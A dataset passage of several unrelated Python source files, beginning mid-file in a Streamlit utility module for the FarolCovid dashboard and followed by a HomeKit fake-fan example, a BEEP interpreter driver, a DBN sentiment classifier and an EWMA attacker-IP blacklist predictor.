\"Resetar aos valores oficais\", reset_button_style, session,\n )\n return user_input, session\n\n\n# TODO: not used\ndef translate_risk(risk_value):\n if risk_value == \"nan\":\n return \"Indef\"\n else:\n try:\n return loader.config[\"br\"][\"farolcovid\"][\"categories\"][risk_value]\n except:\n return risk_value\n\n\ndef genAnalysisDimmensionsCard(dimension: Dimension):\n return f\"\"\"
\n
\n {dimension.text}\n
\n
\"\"\"\n\n\ndef genAnalysisDimmensionsSection(dimensions: List[Dimension]):\n cards = list(map(genAnalysisDimmensionsCard, dimensions))\n cards = \"\".join(cards)\n\n st.write(\n f\"\"\"\n
\n
\n DIMENSÕES DA ANÁLISE\n
\n O que olhamos ao avaliar o cenário da pandemia em um lugar?\n
\n {cards}\n
\n
\"\"\",\n unsafe_allow_html=True,\n )\n\n\ndef genIndicatorCard(indicator: Indicator):\n\n if indicator.display == \"None\":\n indicator.display = \"\"\n indicator.unit = \"\"\n\n # Get name of alert by number\n if indicator.risk == \"nan\":\n alert = \"\"\n else:\n alert = loader.config[\"br\"][\"farolcovid\"][\"categories\"][int(indicator.risk)]\n \n if indicator.right_display == \"estabilizando\":\n indicator_right_display = \"estabilizando em \" + alert\n else:\n indicator_right_display = indicator.right_display\n \n \n\n risk_html_class = \"bold white-span p4\"\n\n return f\"\"\"\n
\n {indicator.header}\n {indicator.caption}\n
\n
\n {indicator.display} {indicator.unit}\n
\n {alert}\n
\n
\n {indicator.left_label}
\n {indicator.left_display}\n
\n
\n {indicator.right_label}
\n {indicator_right_display}\n
\n
\"\"\"\n\n\ndef genKPISection(\n place_type: str,\n locality: str,\n alert: str,\n indicators: Dict[str, Indicator],\n n_colapse_regions: int = 0,\n):\n print(\"\\n\\nQual o alerta?\", alert)\n if not isinstance(alert, str):\n bg = \"gray\"\n alert=\"Sem classificação\"\n caption = \"Sugerimos que confira o nível de risco de seu estado. (Veja Níveis de Risco no menu ao lado)
Seu município não possui dados consistentes suficientes para calcularmos o nível de risco.\"\n stoplight = \"%0a%0a\"\n else:\n bg = AlertBackground(alert).name\n\n if \"state\" in place_type:\n place_type = \"estado\"\n if n_colapse_regions > 0:\n caption = f\"Seu estado está em Risco {alert.upper()} de colapso. Note que {n_colapse_regions} regionais de saúde avaliadas estão em Risco Alto ou Altíssimo.
Recomendamos que políticas de resposta à crise da Covid-19 sejam avaliadas a nível subestatal.\"\n else:\n caption = f\"Seu estado está em Risco {alert.upper()} de colapso. Nenhuma regional de saúde avaliada está em Risco Alto ou Altíssimo de colapso.
Recomendamos que políticas de resposta à crise da Covid-19 sejam avaliadas a nível subestatal.\"\n\n elif \"health_region\" in place_type:\n place_type = \"regional\"\n caption = f\"Risco {alert.upper()} de colapso no sistema de saúde.\"\n else:\n place_type = \"município\"\n caption = f\"Risco {alert.upper()} de colapso no sistema de saúde.\"\n\n msg = f\"\"\"🚨 *BOLETIM CoronaCidades | {locality}, {datetime.now().strftime('%d/%m')}* \n 🚨%0a%0aNÍVEL DE ALERTA: {alert.upper()}\n %0a%0a😷 *SITUAÇÃO DA DOENÇA*: Hoje são reportados❗em média *{indicators['situation'].display} casos por 100mil habitantes.\n %0a%0a *CONTROLE DA DOENÇA*: A taxa de contágio mais recente é de *{indicators['control'].left_display}* - ou seja, uma pessoa infecta em média *{indicators['control'].left_display}* outras.\n %0a%0a🏥 *CAPACIDADE DO SISTEMA*: A capacidade hospitalar será atingida em *{str(indicators['capacity'].display).replace(\"+\", \"mais\")} meses* \n %0a%0a🔍 *CONFIANÇA DOS DADOS*: A cada 10 pessoas infectadas, *{indicators['trust'].display} são diagnosticadas* \n %0a%0a👉 Saiba se seu município está no nível de alerta baixo, médio ou alto acessando o *FarolCovid* aqui: https://coronacidades.org/farol-covid/\"\"\"\n # msg = \"temporarily disabled\"\n\n cards = list(map(genIndicatorCard, indicators.values()))\n cards = \"\".join(cards)\n info_modal = gen_info_modal()\n \n st.write(\n \"\"\"
\n
\n \n %s\n
%s
\n
%s
\n
\n
\n
\n \"\"\"\n % (bg, locality, msg, caption, cards, info_modal),\n unsafe_allow_html=True,\n )\n\n\ndef genProductCard(product: Product):\n if product.recommendation == \"Sugerido\":\n badge_style = \"primary-bg\"\n elif product.recommendation == \"Risco alto\":\n product.recommendation = \"Espere\"\n badge_style = f\"red-alert-bg\"\n elif product.recommendation == \"Risco baixo\":\n product.recommendation = \"Explore\"\n badge_style = \"primary-bg\"\n else:\n badge_style = \"primary-bg\"\n\n return f\"\"\"
\n \n
\n {product.name}\n
\n {product.caption}\n {product.recommendation}\n
\n \"\"\"\n\n\ndef genProductsSection(products: List[Product]):\n cards = list(map(genProductCard, products))\n cards = \"\".join(cards)\n\n st.write(\n f\"\"\"\n
\n O QUE MAIS VOCÊ QUER SABER SOBRE O SEU MUNICÍPIO?\n
{cards}
\n
\n \"\"\",\n unsafe_allow_html=True,\n )\n\n\ndef genInputCustomizationSectionHeader(locality: str) -> None:\n st.write(\n \"\"\"\n
\n Verifique os dados disponíveis (%s)\n

\n Usamos os dados do Brasil.io e DataSUS, mas é possível que esses dados estejam um pouco desatualizados. Se estiverem, é só ajustar os valores abaixo para continuar a simulação.\n
\n
\"\"\"\n % locality,\n unsafe_allow_html=True,\n )\n\n\ndef gen_footer() -> None:\n\n st.write(\n \"\"\"\n
\n
\n
\n A equipe do Coronacidades está à disposição para apoiar o gestor público a aprofundar a análise para seu estado ou município, de forma inteiramente gratuita.\n Também queremos queremos ouvir sua opinião sobre a ferramenta, entre em contato via chat (canto inferior direito). Outras ferramentas e mais recursos para responder à crise da Covid-19 estão disponíveis em nosso site \n coronacidades.org.
\n As análises apresentadas no Farol Covid são indicativas, feitas a partir de dados oficiais públicos e estudos referenciados já publicados, estando sujeitas a variáveis que aqui não podem ser consideradas.\n Trata-se de contribuição à elaboração de cenários por parte dos governos e não configura qualquer obrigação ou responsabilidade perante as decisões efetivadas.\n Saiba mais sobre os cálculos por trás de análises e indicadores em nossas páginas de Níveis de Risco e Modelo Epidemiológico (menu lateral esquerdo), \n que mantemos atualizadas conforme evoluímos em nossas metodologias.

\n Todo código da ferramenta pode ser acessado no Github do projeto\n e os dados estão disponíveis em nossa API.\n

\n \n
\n \n \n
\n
\n
\n
\"\"\"\n % (Logo.IMPULSO.value, Logo.CORONACIDADES.value, Logo.ARAPYAU.value),\n unsafe_allow_html=True,\n )\n\n\n# VIEW COMPONENTS SIMULACOVID\n\n\ndef gen_ambassador_section() -> None:\n\n st.write(\n \"\"\"\n
\n
\n
IMPORTANTE: Usamos dados abertos e históricos para calcular os indicadores.

\n Quer aprofundar a análise para seu Estado ou Município? A equipe do Coronacidades está disponível de forma inteiramente gratuita!\n FALE CONOSCO\n
\"\"\",\n unsafe_allow_html=True,\n )\n\n\ndef genSimulatorOutput(output: SimulatorOutput) -> str:\n\n beds_img = \"https://i.imgur.com/27hutU0.png\"\n icu_beds_img = \"https://i.imgur.com/Oh4l8qM.png\"\n\n if output.min_range_beds < 3 and output.max_range_beds < 3:\n bed_projection = f\"em até {output.max_range_beds} mês(es)\"\n else:\n bed_projection = \"mais de 2 meses\"\n\n if output.min_range_icu_beds < 3 and output.max_range_icu_beds < 3:\n icu_bed_projection = f\"em até {output.max_range_icu_beds} mês(es)\"\n else:\n icu_bed_projection = \"mais de 2 meses\"\n\n output = \"\"\"\n
\n
\n
\n
\n \n %s\n \n
\n \n será atingida a capacidade máxima de leitos\n \n
\n \n
\n
\n
\n
\n
\n \n %s\n \n
\n \n meses será atingida a capacidade máxima de leitos UTI\n \n
\n \n
\n
\"\"\" % (\n bed_projection,\n beds_img,\n icu_bed_projection,\n icu_beds_img,\n )\n\n return output.strip(\"\\n\\t\")\n\n\ndef genChartSimulationSection(simulation: SimulatorOutput, fig) -> None:\n\n simulation = genSimulatorOutput(simulation)\n\n st.write(\n \"\"\"
\n
\n
\n Aqui está o resultado da sua simulação\n
\n
\n %s\n
\n
\n Visão detalhada da sua simulação
\n \n NOTA: \n Para evitar uma sobrecarga hospitalar, a sua demanda (a curva 📈) deve ficar sempre abaixo da respectiva linhas tracejadas (a reta horizontal ➖).\n Em outras palavras, a quantidade de pessoas que precisam ser internadas por dia não deve ultrapassar o número de equipamentos disponíveis.\n \n
\n
\n
\n \"\"\"\n % (simulation),\n unsafe_allow_html=True,\n )\n\n st.plotly_chart(fig, use_container_width=True)\n\n\ndef try_int(possible_int):\n try:\n return int(float(possible_int))\n except Exception as e:\n return possible_int\n\n\n# def genVideoTutorial():\n# st.write(\n# \"\"\"
\n# Antes de começar: entenda como usar!\n#
\"\"\",\n# unsafe_allow_html=True,\n# )\n# st.video(Link.YOUTUBE_TUTORIAL.value)\n\n\n# def genStateInputSectionHeader() -> None:\n# st.write(\n# \"\"\"\n#
\n# Etapa 1: Selecione o seu Estado\n#
\n# \"\"\",\n# unsafe_allow_html=True,\n# )\n\n\n# def genMunicipalityInputSection() -> None:\n# st.write(\n# \"\"\"\n#
\n#
\n# Etapa 2: Selecione seu Município ou Região SUS\n# Se seu município não possui unidade de tratamento intensivo, sugerimos simular a situação da sua regional. Não recomendamos a simulação a nível estadual.\n#
\n#
\n# \"\"\",\n# unsafe_allow_html=True,\n# )\n\n\n# def genResourceAvailabilitySection(resources: ResourceAvailability) -> None:\n# msg = f\"\"\"\n# 🚨 *BOLETIM CoronaCidades:* {resources.locality} - {datetime.now().strftime('%d/%m')} 🚨%0a%0a\n# 😷 *{int(resources.cases)}* casos confirmados e *{int(resources.deaths)}* mortes%0a%0a\n# 🏥 Hoje estão disponíveis *{resources.beds}* leitos e *{resources.ventilators}* ventiladores destinados à Covid %0a%0a\n# 👉 _Acompanhe e simule a situação do seu município acessando o *SimulaCovid* aqui_: https://coronacidades.org/ \"\"\"\n\n# st.write(\n# \"\"\"\n#
\n#
\n#
\n# Panorama %s\n# Compartilhar no Whatsapp\n#
\n#
\n#
\n# Progressão da Transmissão\n#
\n#
\n#
\n# %i\n# casos confirmados\n#
\n#
\n# %i\n# mortes\n#
\n#
\n# Fonte: Brasil.IO atualizado diariamente com base em boletins das secretarias de saúde publicados.\n#
\n#
\n#
\n# Capacidade hospitalar destinada à COVID\n#
\n#
\n#
\n# %i\n# leitos\n#
\n#
\n# %i\n# ventiladores\n#
\n#
\n# Fonte:\n# DATASUS CNES, Fevereiro 2020. Assumimos que 20%% dos leitos complementares e ventiladores registrados da rede SUS e não-SUS seriam alocados para pacientes da Covid-19. Esse número poderá ser ajustado na simulação abaixo.\n# \n#
\n# Esse dado está desatualizado? Você tem informações mais recentes e pode colaborar conosco?\n# Estamos montando uma rede para manter o SimulaCovid sempre atualizado e nossas projeções serem úteis para tomada de decisão na sua cidade. Venha ser parte do nosso time de embaixadores!\n# Quero ser embaixador\n#
\n#
\n#
\n#
\n# \"\"\"\n# % (\n# resources.locality,\n# msg,\n# resources.cases,\n# resources.deaths,\n# resources.beds,\n# resources.ventilators,\n# Link.AMBASSADOR_FORM.value,\n# ),\n# unsafe_allow_html=True,\n# )\n\n\n# def genSimulationSection(\n# active_cases: int,\n# locality: str,\n# resources: ResourceAvailability,\n# worst_case: SimulatorOutput,\n# best_case: SimulatorOutput,\n# ) -> None:\n# no_quarentine = (\n# \"mais de 90\"\n# if (worst_case.max_range_beds == -1 and worst_case.max_range_ventilators == -1)\n# else min(worst_case.max_range_beds, worst_case.max_range_ventilators)\n# )\n# date_proj = \"\"\n# if no_quarentine != \"mais de 90\":\n# proj = (datetime.now() + timedelta(days=int(no_quarentine))).strftime(\"%d/%m\")\n# date_proj = f\" *({proj})* \"\n\n# msg = f\"\"\"\n# 🚨 *BOLETIM SimulaCovid:* {resources.locality} - {datetime.now().strftime('%d/%m')} 🚨%0a%0a\n# 🏥 Considerando que {resources.locality} tem *{resources.beds}* leitos 🛏️ e *{resources.ventilators}* ventiladores ⚕ %0a%0a\n# 😷 Na ausência de isolamento social, {resources.locality} poderia atingir a sua capacidade hospitalar em *{no_quarentine}* dias{date_proj}%0a%0a\n# 👉 _Acompanhe e simule a situação do seu município acessando o *SimulaCovid* aqui_: https://coronacidades.org/ \"\"\"\n\n# status_quo = genSimulatorOutput(worst_case)\n# restrictions = genSimulatorOutput(best_case)\n\n# st.write(\n# \"\"\"\n#
\n#
\n#
\n# \n# %s\n#
\n# Daqui a quantos dias será atingida a capacidade hospitalar?\n#
\n#
\n#
\n#
\n# \n# Sem Políticas de Restrição\n# \n#
\n# %s\n#
\n#
\n#
\n# \n# Com Medidas Restritivas (Isolamento Social)\n# \n#
\n# %s\n# Compartilhar no Whatsapp\n#
\n#
\n#
\n# \"\"\"\n# % (locality, status_quo, restrictions, msg),\n# unsafe_allow_html=True,\n# )\n\n\n# def genActNowSection(locality, worst_case):\n# display = (\n# \"\"\n# if any(\n# value != -1\n# for value in [\n# worst_case.min_range_beds,\n# worst_case.max_range_beds,\n# worst_case.min_range_ventilators,\n# worst_case.max_range_ventilators,\n# ]\n# )\n# else \"hide\"\n# )\n\n# st.write(\n# \"\"\"\n#
\n#
\n#
\n# %s | Você precisa agir agora \n# Para prevenir uma sobrecarga hospitalar, é preciso implementar uma estratégia de contenção. Quanto antes você agir, mais vidas consegue salvar.\n#
\n#
\n#
\n# \"\"\"\n# % (display, locality),\n# unsafe_allow_html=True,\n# )\n\n# def genStrategyCard(strategy: ContainmentStrategy) -> str:\n# return \"\"\"\n#
\n#
\n# ESTRATÉGIA %i\n#
\n# %s\n#
\n#
\n# \n# %s\n#
\"\"\" % (\n# strategy.color.value,\n# strategy.code,\n# strategy.background.value,\n# strategy.name,\n# strategy.image_url,\n# strategy.description,\n# )\n\n\n# def genStrategiesSection(strategies: List[ContainmentStrategy]) -> None:\n# cards = list(map(genStrategyCard, strategies))\n# cards = \"\".join(cards)\n# st.write(\n# \"\"\"\n#
\n#
\n# E como você pode reagir?\n#
%s
\n#
\n#
\n# \"\"\"\n# % cards,\n# unsafe_allow_html=True,\n# )\n","sub_path":"src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":49681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"524522263","text":"\"\"\"A fake fan that does nothing but to demonstrate optional characteristics.\"\"\"\nimport logging\n\nfrom pyhap.accessory import Accessory, Category\nimport pyhap.loader as loader\n\nlogger = logging.getLogger(__name__)\n\n\nclass FakeFan(Accessory):\n \"\"\"A fake fan accessory that logs changes to its rotation speed and direction.\"\"\"\n\n category = Category.FAN\n\n def set_rotation_speed(self, value):\n logger.debug(\"Rotation speed changed: %s\", value)\n\n def set_rotation_direction(self, value):\n logger.debug(\"Rotation direction changed: %s\", value)\n\n def _set_services(self):\n \"\"\"Add the fan service. Also add optional characteristics to it.\"\"\"\n super(FakeFan, self)._set_services()\n service_loader = loader.get_serv_loader()\n fan_service = service_loader.get(\"Fan\")\n # NOTE: Don't forget that all characteristics must be added to the service before\n # adding the service to the accessory, so that it can assign IIDs to all.\n\n # Add the optional RotationSpeed characteristic to the Fan\n rotation_speed_char = loader.get_char_loader().get(\"RotationSpeed\")\n fan_service.add_opt_characteristic(rotation_speed_char)\n rotation_speed_char.setter_callback = self.set_rotation_speed\n\n # Add the optional RotationSpeed characteristic to the Fan\n rotation_dir_char = loader.get_char_loader().get(\"RotationDirection\")\n fan_service.add_opt_characteristic(rotation_dir_char)\n rotation_dir_char.setter_callback = self.set_rotation_direction\n\n self.add_service(fan_service)\n","sub_path":"deps/lib/python3.5/site-packages/pyhap/accessories/FakeFan.py","file_name":"FakeFan.py","file_ext":"py","file_size_in_byte":1581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"157726660","text":"#!/usr/bin/env python3\n# p5Driver.py\n# Purpose: \n# To execute the BEEP source code and store all variables and labels \n# to their respective dictionary\n# Input: \n# A file with BEEP source code \n# Output:\n# The source code itself with line number on the left hand side\n# A list of variables that includes the variable's name, type and initial value (alphabetically)\n# A list of labels that includes the label's name, line number (alphabetically)\n\nimport os\nimport sys\nimport re\nfrom p5Dict import declareVar, declareLabel, printVariables, printLabels\n\n# Empty dictionary for:\n# varTypeD - The data type for the variable\n# varValueD - The initial value for the variable \n# labelD - The line number for labels\nvarTypeD = {}\nvarValueD = {}\nlabelD ={}\n\n# extracting the arguments\nargs= list(x for x in sys.argv[:])\n\n# assign the beep file\nbeep_file_name = args[1]\n\n# open for reading\ntry:\n with open(beep_file_name,'r', encoding='latin-1') as beep_file: \n # parse the items\n lines = beep_file.readlines()\nexcept IOError: \n print('ERROR OPENING A FILE')\nexcept:\n print('SOMETHING UNEXPECTED HAPPENDED!!!')\n\n# Print the header output, \n# For loop to output the file line by line start with line number relative to 1\n# Regex testing to call the appropriate function\n# \n# line_num - line number relative to 1\n\nline_num = 0\nprint('BEEP source code in {}'.format(args[1]))\nfor line in lines:\n line_num += 1\n line = line.rstrip('\\n')\n print('{}. 
{}'.format(line_num,line) )\n \n # Regex testing for specific pattern\n var_pattern = r'^\\s*VAR.*$'\n comment_pattern = r'^\\s*#.*$'\n label_pattern = r'^\\s*\\S.+:\\s*((ASSIGN)|(IF)|(PRINT)|(GOTO)|(assign)|(if)|(print)|(goto)).*$'\n stat_pattern = r'^\\s*((ASSIGN)|(IF)|(PRINT)|(GOTO)|(assign)|(if)|(print)|(goto)).*$'\n\n # searching for specific pattern (for prog 5, only need variable and label)\n # VAR\n match = re.search(var_pattern, line)\n if match:\n # split the line into a list of string \n temp = line.split()[1:]\n declareVar (temp,varTypeD,varValueD)\n\n # labels\n match = re.search(label_pattern, line)\n if match:\n declareLabel(line, line_num, labelD)\n\n# Print the variables and labels alphabetically\nprintVariables(varTypeD,varValueD)\nprintLabels(labelD)\n","sub_path":"PL/Prog5/TracLong/p5Driver.py","file_name":"p5Driver.py","file_ext":"py","file_size_in_byte":2420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"246692667","text":"#logistic regrssiom, naive bayes, svm\nfrom dbn_outside.dbn.tensorflow import SupervisedDBNClassification\nfrom sentiment_analysis import create_feature_set_and_labels\nimport numpy as np\nfrom statistics import mean\nimport pickle\nfrom sklearn.metrics.classification import accuracy_score\nfrom tfidf_vectorizer import get_features\nfrom sklearn.metrics import f1_score\n\n# train_x,train_y,test_x,test_y = pickle.load(open(\"attr.pickle\",\"rb\"))\n# train_x = np.array(list(train_x))\ntrain_x, train_y, test_x, test_y = get_features('dbn')\n#train_x, train_y, test_x, test_y = create_feature_set_and_labels('pos_final.txt', 'neg_final.txt')\n#print(type(train_x))\nprint(len(train_x),len(train_y),len(test_x),len(test_y))\ntrain_x = np.array(train_x,dtype=np.float32)\n#print(type(train_x))\ntrain_y = np.array(train_y,dtype=np.int32)\ntest_x = np.array(test_x,dtype=np.float32)\ntest_y = np.array(test_y,dtype=np.int32)\nprint(type(train_x))\nclassifier = SupervisedDBNClassification(hidden_layers_structure=[256,256,256],\n learning_rate_rbm=0.05,\n learning_rate=0.1,\n n_epochs_rbm=10,\n n_iter_backprop=100,\n batch_size=32,\n activation_function='relu',\n dropout_p=0.2)\nclassifier.fit(train_x, train_y)\n# classifier = SupervisedDBNClassification.load('model.pkl')\n# classifier.save('model.pkl')\naccuracies = []\nf_measures = []\nfor i in range(1):\n y_pred = classifier.predict(test_x)\n accuracy = accuracy_score(test_y, y_pred)\n f_measure = f1_score(test_y, y_pred)\n accuracies.append(accuracy)\n f_measures.append(f_measure)\nprint(accuracies)\nprint('Accuracy ', mean(accuracies))\nprint('F-measure', mean(f_measures))\n","sub_path":"dbn_neuralnet.py","file_name":"dbn_neuralnet.py","file_ext":"py","file_size_in_byte":1888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"180425416","text":"# --------------------------------------------------------------------------------\n# Universidad de San Carlos de Guatemala\n# Facultad de Ingenieria\n# Escuela de Ciencias y Sistemas\n# Organizacion de Lenguajes y Compiladores 2\n# GRUPO 4\n# ANALIZADOR LÉXICO\n# --------------------------------------------------------------------------------\n\nimport ply.lex as lex\nfrom Statics.errorTable import ErrorTable\n\nreserved = {\n\n # Numerc Types\n 'smallint': 'SMALLINT',\n 'integer': 'INTEGER', #\n 'bigint': 'BIGINT', \n 'decimal': 'DECIMAL_T',\n 'numeric': 'NUMERIC',\n 'real': 'REAL', #\n 'double': 'DOUBLE',\n 'precition': 'PRECITION',\n 'money': 'MONEY',\n 
'float': 'FLOAT',\n\n # Boolean Type\n 'boolean': 'BOOLEAN', #\n 'true': 'TRUE',\n 'false': 'FALSE',\n 'yes': 'YES',\n 'no': 'NO',\n 'off': 'OFF',\n\n # Character types\n 'character': 'CHARACTER',\n 'varying': 'VARYING',\n 'varchar': 'VARCHAR',\n 'char': 'CHAR',\n 'text': 'TEXT',\n\n # Date/Time Types\n 'timestamp': 'TIMESTAMP',\n 'date': 'DATE',\n 'time': 'TIME',\n 'interval': 'INTERVAL',\n 'year': 'YEAR',\n 'month': 'MONTH',\n 'day': 'DAY',\n 'hour': 'HOUR',\n 'minute': 'MINUTE',\n 'second': 'SECOND',\n 'extract': 'EXTRACT',\n 'date_part': 'DATE_PART',\n #'now': 'NOW',\n 'current_date': 'CURRENT_DATE',\n 'current_time': 'CURRENT_TIME',\n\n # Enumerated Type\n 'enum': 'ENUM',\n\n # Operators\n 'between': 'BETWEEN',\n 'symmetric': 'SYMMETRIC',\n 'in': 'IN',\n 'like': 'LIKE',\n 'ilike': 'ILIKE',\n 'similar': 'SIMILAR',\n 'is': 'IS',\n 'isnull': 'ISNULL',\n 'notnull': 'NOTNULL',\n 'not': 'NOT',\n 'and': 'AND',\n 'or': 'OR',\n 'null': 'NULL',\n\n # Conditionals\n 'if': 'IF',\n 'else': 'ELSE',\n\n # Generals\n 'use': 'USE',\n 'database': 'DATABASE',\n 'databases': 'DATABASES',\n 'create': 'CREATE',\n 'insert': 'RINSERT',\n 'into': 'INTO',\n 'alter': 'ALTER',\n 'table': 'TABLE',\n 'show': 'SHOW',\n 'drop': 'RDROP',\n 'delete': 'RDELETE',\n 'truncate': 'RTRUNCATE',\n 'primary': 'PRIMARY',\n 'foreign': 'FOREIGN',\n 'key': 'KEY',\n 'add': 'ADD',\n 'column': 'COLUMN',\n 'set': 'SET',\n 'type': 'TYPE',\n 'constraint': 'CONSTRAINT',\n 'unique': 'UNIQUE',\n 'check': 'CHECK',\n 'references': 'REFERENCES',\n 'exists': 'EXISTS',\n 'replace': 'REPLACE',\n 'owner': 'OWNER',\n 'new_owner': 'NEW_OWNER',\n 'current_user': 'CURRENT_USER',\n 'session_user': 'SESSION_USER',\n 'mode': 'MODE',\n 'rename': 'RENAME',\n 'inherits': 'INHERITS',\n 'values': 'VALUES',\n 'update': 'UPDATE',\n 'where': 'WHERE',\n 'from': 'FROM',\n 'select': 'RSELECT',\n 'distinct': 'DISTINCT',\n 'group': 'GROUP',\n 'order': 'ORDER',\n 'by': 'BY',\n 'as': 'AS',\n 'having': 'HAVING',\n 'unknown': 'UNKNOWN',\n 'escape': 'ESCAPE',\n 'any': 'ANY',\n 'all': 'ALL',\n 'some': 'SOME',\n 'left': 'LEFT',\n 'right': 'RIGHT',\n 'full': 'FULL',\n 'outer': 'OUTER',\n 'inner': 'INNER',\n 'join': 'JOIN',\n 'on': 'ON',\n 'using': 'USING',\n 'natural': 'NATURAL',\n 'asc': 'ACS',\n 'desc': 'DESC',\n 'first': 'FIRST',\n 'last': 'LAST',\n 'case': 'CASE',\n 'when': 'WHEN',\n 'then': 'THEN',\n 'end': 'END',\n 'greatest': 'GREATEST',\n 'least': 'LEAST',\n 'limit': 'LIMIT',\n 'offset': 'OFFSET',\n 'union': 'RUNION',\n 'intersect': 'RINTERSECT',\n 'except': 'REXCEPT',\n 'to': 'TO'\n\n}\n\ntokens = [\n 'INT',\n 'DECIMAL',\n 'ID',\n 'CADENA',\n 'SUMA',\n 'RESTA',\n 'MULT',\n 'DIVISION',\n 'POTENCIA',\n 'MODULO',\n 'PARI',\n 'PARD',\n 'PUNTO',\n 'PCOMA',\n 'COMA',\n 'LLAVEI',\n 'LLAVED',\n 'CORCHI',\n 'CORCHD',\n 'IGUAL',\n 'MENORQ',\n 'MAYORQ',\n 'MAYORIGUAL',\n 'MENORIGUAL',\n 'IGUALQ',\n 'DISTINTO',\n 'CONCAT',\n 'BAND',\n 'BOR',\n 'NUMERAL',\n 'VIRGULILLA',\n 'MOVD',\n 'MOVI',\n 'NEWLINE'\n\n] + list(reserved.values())\n\n# Operadores aritméticos\nt_SUMA = r'\\+'\nt_RESTA = r'-'\nt_MULT = r'\\*'\nt_DIVISION = r'/'\nt_POTENCIA = r'\\^'\nt_MODULO = r'%'\nt_PARI = r'\\('\nt_PARD = r'\\)'\nt_PUNTO = r'\\.'\nt_PCOMA = r'\\;'\nt_COMA = r'\\,'\nt_LLAVEI = r'{'\nt_LLAVED = r'}'\nt_CORCHI = r'\\['\nt_CORCHD = r'\\]'\nt_IGUAL = r'\\='\n\n# Operadores relacionales\nt_MENORQ = r'\\<'\nt_MAYORQ = r'\\>'\nt_MENORIGUAL = r'\\<='\nt_MAYORIGUAL = r'\\>='\nt_IGUALQ = r'\\=='\n\nt_CONCAT = r'\\|\\|'\nt_BAND = r'\\&'\nt_BOR = r'\\|'\nt_NUMERAL = r'\\#'\nt_VIRGULILLA = r'\\~'\nt_MOVD 
= r'\\>\\>'\nt_MOVI = r'\\<\\<'\n\n\ndef t_ID(t):\n r'[a-zA-Z_][a-zA-Z_0-9]*'\n t.type = reserved.get(t.value.lower(), 'ID')\n return t\n\n\ndef t_CADENA(t):\n r'(\\\".*?\\\"|\\'.*?\\')'\n t.value = t.value[1:-1]\n return t\n\n\ndef t_DISTINTO(t):\n r'(!=|<>)'\n t.type = reserved.get(t.value.lower(), 'DISTINTO')\n return t\n\n\ndef t_DECIMAL(t):\n r'\\d+\\.\\d+'\n try:\n t.value = float(t.value)\n except ValueError:\n print(\"Valor decimal muy largo %d\", t.value)\n t.value = 0\n return t\n\n\ndef t_INT(t):\n r'\\d+'\n try:\n t.value = int(t.value)\n except ValueError:\n print(\"Valor entero muy largo %d\", t.value)\n t.value = 0\n return t\n\n\n# Comentarios:\n# multilinea /* .. */\ndef t_COMENTARIO_MULTILINEA(t):\n r'/\\*(.|\\n)*?\\*/'\n t.lexer.lineno += t.value.count('\\n')\n\n# simple --\n\n\ndef t_COMENTARIO_SIMPLE(t):\n r'--(.)+(\\n)+'\n #t.lexer.lineno += 1\n\n\n# Caracteres ignorados\nt_ignore = \" \\t\"\n\n\ndef t_NEWLINE(t):\n r'\\n+'\n t.lexer.lineno += t.value.count(\"\\n\")\n \n\ndef t_error(t):\n print(\"Caracter inválido %s\" % t.value[0])\n error = (\"Léxico\", \"Caracter inválido %s\" % t.value[0], t.lexer.lineno)\n ErrorTable.add(error)\n t.lexer.skip(1)\n\n\n\nlexico = lex.lex()\n","sub_path":"parser/team04/Interpreter/lex.py","file_name":"lex.py","file_ext":"py","file_size_in_byte":5896,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"91705815","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n# file with utility variables & functions\n\nimport datetime as dt\n\n# ewma degree of weight decrease (value closer to 1 give more weight to most recent trends)\nalpha = 0.9\n\n# threshold for blacklisting an ip\newma_threshold = 0.5\n\n# day offset\noffset = 17\n\n# training window length\nwindow_len = 5\n\n# compute blacklists based on local contributor logs\ndef local_prediction(top_targets, train_set, window):\n \n binary_mat = dict()\n prediction = dict()\n blacklist = dict()\n whitelist = dict()\n binary_mat = binary_matrix(top_targets, train_set, window)\n prediction = local_score_prediction(binary_mat)\n blacklist, whitelist = local_blacklist(prediction)\n \n return blacklist, whitelist\n\n# compute the binary matrix required for EWMA\ndef binary_matrix(targets, train_set, window):\n\n # the binary matrix with keys of the form 'victim' contains a second dictionary with keys \n # 'src_ip' and values the binary list for all days e.g. 
[1, 0, 0, 0, 0]\n binary_matrix = dict()\n \n for victim in targets:\n binary_matrix[victim] = dict() \n \n c = train_set.groupby(['target_ip', 'src_ip'])\n \n # iterate through the groups\n for group, row in c:\n \n binary_matrix[group[0]][group[1]] = [0 for r in xrange(window_len)]\n \n # get the days of attacks\n d = row['D']\n for day in d:\n binary_matrix[group[0]][group[1]][day.day - window - offset] = 1 \n del d\n \n del c\n \n return binary_matrix\n\n# compute the ewma prediction for each contributor\ndef local_score_prediction(binary_matrix):\n \n predictions = dict()\n\n for target in binary_matrix:\n \n predictions[target] = dict()\n \n for attacker in binary_matrix[target]:\n \n predictions[target][attacker] = ts_score(window_len, binary_matrix[target][attacker]) \n \n return predictions\n\n# generate the blacklist based on the ewma predictions \ndef local_blacklist(predictions):\n \n local_blacklists = dict()\n local_whitelists = dict()\n \n # for every contributor\n for victim in predictions:\n \n # get those attackers that have scored above the threshold\n l = [(k, v) for k, v in predictions[victim].iteritems() if v >= ewma_threshold]\n local_blacklists[victim] = set([w[0] for w in l])\n m = [(k, v) for k, v in predictions[victim].iteritems() if v < ewma_threshold]\n local_whitelists[victim] = set([z[0] for z in m])\n \n return local_blacklists, local_whitelists \n\n# ewma weight generation\ndef compute_weights(a, N):\n ws = list()\n for i in range(N - 1, -1, -1):\n w = a * ((1-a)**i)\n ws.append(w)\n \n return ws\n\n# sum weighted data\ndef sum_weighted(data, ws):\n wt = list()\n for i, x in enumerate(data):\n wt.append(x*ws[i])\n \n return sum(wt)\n\n# assign a ewma score\ndef ts_score(N, data):\n ws = compute_weights(alpha, N)\n pred = sum_weighted(data, ws)\n \n return pred 